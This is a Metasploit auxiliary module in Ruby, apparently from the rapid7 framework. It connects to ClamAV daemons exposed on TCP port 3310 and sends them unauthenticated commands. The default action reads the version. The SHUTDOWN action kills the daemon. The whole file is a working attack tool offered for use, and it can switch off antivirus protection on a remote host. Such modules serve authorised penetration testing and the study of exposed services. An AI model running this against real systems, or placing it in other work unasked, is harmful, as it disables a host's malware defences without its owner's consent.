1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Scanner
9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'ClamAV Remote Command Transmitter',
14
        'Description' => %q{
15
          In certain configurations, ClamAV will bind to all addresses and listen for commands.
16
          This module sends properly-formatted commands to the ClamAV daemon if it is in such a
17
          configuration.
18
        },
19
        'Author' => [
20
          'Alejandro Hdeza', # DISCOVER
21
          'bwatters-r7',     # MODULE
22
          'wvu'              # GUIDANCE
23
        ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],
27
          [ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
28
        ],
29
        'DisclosureDate' => '2016-06-08',
30
        'Actions' => [
31
          [ 'VERSION', 'Description' => 'Get Version Information' ],
32
          [ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
33
        ],
34
        'DefaultAction' => 'VERSION',
35
        'Notes' => {
36
          'Reliability' => UNKNOWN_RELIABILITY,
37
          'Stability' => UNKNOWN_STABILITY,
38
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
39
        }
40
      )
41
    )
42
    register_options(
43
      [
44
        Opt::RPORT(3310)
45
      ], self.class
46
    )
47
  end
48

49
  def run_host(_ip)
50
    begin
51
      connect
52
      sock.put(action.name + "\n")
53
      print_good(sock.get_once)
54
    rescue EOFError
55
      print_good('Successfully shut down ClamAV Service')
56
    ensure
57
      disconnect
58
    end
59
  end
60
end
61

62